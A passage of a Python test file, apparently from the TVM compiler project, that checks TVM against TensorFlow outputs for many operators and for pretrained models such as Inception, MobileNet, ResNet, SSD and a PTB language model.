in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select, SelectV2
# -------------
def test_forward_where():
""" Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except ImportError:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
        # Cell inputs 'c' and 'h' consist of all layers' values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).asnumpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).asnumpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
        # Create 10 predicted statements of 20 words each
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
""" testing local response normalization """
    lrn_depth_radius = size // 2  # integer radius, matching the original Python 2 division
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
""" testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_transpose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
    _test_forward_transpose_axes_input((2, 3, 4), (1, 2, 0))
    _test_forward_transpose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax """
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square """
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp """
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan """
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1 """
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign """
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint """
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg """
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
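# Note on check_size above: as the inline comment explains, if every placeholder
# dimension were static, TF would constant-fold tf.size away and the converter
# would never see a Size op, so the first dimension is deliberately left dynamic.
# Minimal sketch of that shape handling (illustrative only, not executed here):
#
#     tf_input_shape = list((10, 8, 16, 32))
#     tf_input_shape[0] = None   # -> [None, 8, 16, 32]; keeps the Size op in the graph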
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
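# Note on _check_op above (descriptive): tf.math.reduce_prod is special-cased to a
# flattened (1, N) input reduced over axis=1, regardless of the requested axis and
# keepdims. The original does not state why; presumably (an assumption, not stated
# in the source) this keeps the product of the sampled values in a well-behaved
# range. All other reduce ops use the axis/keepdims combinations from _test_math_op.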
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
